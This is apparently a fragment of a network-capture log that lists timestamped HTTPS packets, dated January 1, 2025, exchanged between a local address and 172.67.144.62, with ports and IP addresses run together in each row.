                                                      Jan 1, 2025 05:36:01.584054947 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.584059954 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.584069014 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.584095955 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.584115028 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.584213018 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.584254980 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.584374905 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.584467888 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.588716030 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.588759899 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.588787079 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.588850975 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.588859081 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.589112997 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.676201105 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.676331043 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.676363945 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.676390886 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.676417112 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.676460028 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.676470041 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.676527977 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.676548958 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.677299023 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.677355051 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.677383900 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.677407980 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.677407980 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.677417040 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.677432060 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.677443981 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.677462101 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.678252935 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.678297997 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.678349018 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.678354979 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.678359985 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.678391933 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.678400040 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.678404093 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.678431988 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.678455114 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.679204941 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.679239035 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.679265022 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.679291010 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.679300070 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.679305077 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.679337978 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.679390907 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.681123972 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.681433916 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.681451082 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.681493998 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.768801928 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.768867016 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.768944025 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.769002914 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.769037008 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.769078016 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.769125938 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.769175053 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.769216061 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.769269943 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.769380093 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.769412994 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.769424915 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.769431114 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.769438982 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.769457102 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.769465923 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.769469023 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.769495010 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.769517899 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.769856930 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.769896984 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.769913912 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.769917965 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.769926071 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.769942999 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.769968987 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.769973040 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.770029068 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.770587921 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.770622015 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.770642042 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.770647049 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.770674944 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.770700932 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.770714998 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.770755053 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.770762920 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.770766020 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.770786047 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.770796061 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.770807981 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.770811081 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.771168947 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.771195889 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.771563053 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.771605015 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.771617889 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.771622896 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.771646976 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.771665096 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.861345053 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.861387014 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.861455917 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.861463070 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.861474991 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.861498117 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.861519098 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.861522913 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.861541033 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.861562014 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.861567020 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.861588955 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.861609936 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.861835003 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.861884117 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.861903906 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.861948967 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.862400055 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.862432003 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.862447023 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.862449884 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.862467051 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.862474918 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.862489939 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.862493038 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.862518072 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.862543106 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.862838984 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.862874031 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.862895012 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.862898111 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.862907887 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.862926006 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.862931967 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.862935066 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.862943888 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.862963915 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.862981081 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.862993956 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.862997055 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.863014936 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.863039017 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.863679886 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.863718033 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.863735914 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.863740921 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.863768101 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.863775015 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.863812923 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.863857985 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.863864899 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.863867998 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.863888979 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.863895893 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.863919020 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.863922119 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.863953114 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.863969088 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.863977909 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.863981009 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.864007950 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.864033937 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.864867926 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.864898920 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.864929914 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.864933968 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.864944935 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.864963055 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.864979029 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.864988089 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.864990950 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.865008116 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.865019083 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.865036964 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.865040064 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.865062952 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.865087032 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.865720034 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.865758896 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.865763903 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.865767956 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.865808964 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.954052925 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.954072952 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.954138994 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.954148054 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.954183102 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.954344988 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.954360008 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.954391956 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.954396009 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.954423904 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.954437971 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.954854965 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.954868078 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.954927921 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.954932928 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.954972982 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.955156088 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.955173016 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.955219984 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.955224991 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.955265045 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.959109068 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.959124088 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.959172010 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.959177017 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.959213972 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.959223032 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.959671974 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.959685087 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.959748030 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.959750891 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.959809065 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.960092068 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.960108042 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.960164070 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:01.960169077 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:01.960210085 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.052865028 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.052881956 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.052962065 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.052967072 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053011894 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.053045034 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053056955 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053105116 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.053108931 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053148985 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.053194046 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053208113 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053262949 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.053267956 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053303957 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.053411961 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053425074 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053477049 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.053481102 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053520918 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.053702116 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053714991 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053776026 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.053781033 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053818941 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.053922892 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053939104 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.053971052 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.053976059 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.054007053 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.054022074 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.054131031 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.054152012 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.054188013 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.054191113 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.054197073 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.054224968 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.054250002 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.054402113 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.054419994 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.054471970 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.054476023 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.054522991 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.138999939 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139015913 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139075994 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.139081955 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139121056 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.139269114 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139281988 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139316082 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.139319897 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139343977 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.139362097 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.139370918 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139410019 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139415979 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.139421940 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139451981 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.139484882 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139523983 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.139698029 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139712095 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139746904 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.139751911 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139765024 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.139791965 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.139827967 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139882088 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.139885902 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.139919043 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.140198946 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.140217066 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.140252113 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.140258074 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.140284061 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.140301943 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.140444994 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.140459061 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.140491962 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.140495062 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.140503883 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.140527010 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.140531063 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.140551090 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.140553951 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.140580893 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.140599012 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.140893936 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.140908003 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.140979052 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.140983105 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.140994072 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.141021967 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.141025066 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.141051054 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.141074896 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.232028961 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.232062101 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.232131004 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.232140064 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.232177973 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.232387066 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.232408047 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.232441902 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.232446909 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.232460022 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.232502937 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.232538939 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.232543945 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.232553005 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.232582092 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.232669115 CET44349731172.67.144.62192.168.2.4
                                                      Jan 1, 2025 05:36:02.232721090 CET49731443192.168.2.4172.67.144.62
                                                      Jan 1, 2025 05:36:02.233016968 CET44349731172.67.144.62192.168.2.4
